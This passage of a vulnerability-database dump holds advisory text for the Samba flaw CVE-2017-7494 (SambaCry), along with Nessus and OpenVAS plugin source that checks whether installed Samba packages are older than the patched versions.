pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"samba\", pkgver:\"4.4.14\", 
pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"samba\", pkgver:\"4.6.4\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.6.4\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:24", "description": "From Red Hat Security Advisory 2017:1270 :\n\nAn update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.", "edition": 36, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba-libs", "p-cpe:/a:oracle:linux:samba-common", "p-cpe:/a:oracle:linux:libwbclient", "p-cpe:/a:oracle:linux:samba-vfs-glusterfs", "p-cpe:/a:oracle:linux:samba-pidl", "p-cpe:/a:oracle:linux:ctdb", "p-cpe:/a:oracle:linux:samba-devel", "p-cpe:/a:oracle:linux:samba-dc-libs", "p-cpe:/a:oracle:linux:samba-test", "p-cpe:/a:oracle:linux:samba-common-tools", "p-cpe:/a:oracle:linux:samba-doc", "p-cpe:/a:oracle:linux:samba-test-libs", "p-cpe:/a:oracle:linux:samba-domainjoin-gui", "p-cpe:/a:oracle:linux:samba-dc", "p-cpe:/a:oracle:linux:libsmbclient", "p-cpe:/a:oracle:linux:libwbclient-devel", "p-cpe:/a:oracle:linux:samba-winbind", "p-cpe:/a:oracle:linux:samba-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba-client", "p-cpe:/a:oracle:linux:samba-winbind-modules", "p-cpe:/a:oracle:linux:samba-common-libs", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:samba", "p-cpe:/a:oracle:linux:samba-swat", "p-cpe:/a:oracle:linux:samba-winbind-clients", "p-cpe:/a:oracle:linux:samba-krb5-printing", "p-cpe:/a:oracle:linux:libsmbclient-devel", "p-cpe:/a:oracle:linux:samba-python", "p-cpe:/a:oracle:linux:samba-winbind-devel", "p-cpe:/a:oracle:linux:ctdb-tests", "p-cpe:/a:oracle:linux:samba-glusterfs", "p-cpe:/a:oracle:linux:samba-client-libs"], "id": "ORACLELINUX_ELSA-2017-1270.NASL", "href": "https://www.tenable.com/plugins/nessus/100396", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:1270 and \n# Oracle Linux Security 
Advisory ELSA-2017-1270 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100396);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1270\");\n\n script_name(english:\"Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:1270 :\n\nAn update for samba is now available for Red Hat Enterprise Linux 6\nand Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) protocol and the related Common Internet File System (CIFS)\nprotocol, which allow PC-compatible machines to share files, printers,\nand various information.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006924.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-May/006926.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-krb5-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-test-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-vfs-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.6.23-43.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.6.23-43.0.1.el6_9\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ctdb-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ctdb-tests-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", 
reference:\"libsmbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-pidl-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.4-14.el7_3\")) flag++;\nif 
(rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.4-14.el7_3\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.4-14.el7_3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310872718", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872718", "type": "openvas", "title": "Fedora Update for samba FEDORA-2017-570c0071c4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba FEDORA-2017-570c0071c4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872718\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 07:02:25 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2017-570c0071c4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-570c0071c4\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W4BBCPF57PGSZEEE47TVMTZE3RQ4V54I\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.14~0.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba' package(s) announced via the referenced advisory.", "modified": "2019-03-13T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310843180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843180", "type": "openvas", "title": "Ubuntu Update for samba USN-3296-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for samba USN-3296-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843180\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:50:14 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for samba USN-3296-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Samba incorrectly\nhandled shared libraries. 
A remote attacker could use this flaw to upload a\nshared library to a writable share and execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"samba on Ubuntu 17.04,\n Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3296-1\");\n script_xref(name:\"URL\", value:\"https://www.ubuntu.com/usn/usn-3296-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.14.04.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.5.8+dfsg-0ubuntu0.17.04.2\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.4.5+dfsg-2ubuntu5.6\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.3.11+dfsg-0ubuntu0.16.04.7\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "Check the version of libsmbclient", "modified": "2019-03-08T00:00:00", "published": "2017-05-26T00:00:00", "id": "OPENVAS:1361412562310882726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882726", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2017:1270 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2017:1270 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882726\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-26 06:32:28 +0200 (Fri, 26 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for libsmbclient CESA-2017:1270 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of libsmbclient\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\n the Server Message Block (SMB) protocol and the related Common Internet File\n System (CIFS) protocol, which allow PC-compatible machines to share files,\n printers, and various information. Security Fix(es): * A remote code execution\n flaw was found in Samba. A malicious authenticated samba client, having write\n access to the samba share, could use this flaw to execute arbitrary code as\n root. (CVE-2017-7494) Red Hat would like to thank the Samba project for\n reporting this issue. 
Upstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1270\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022419.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 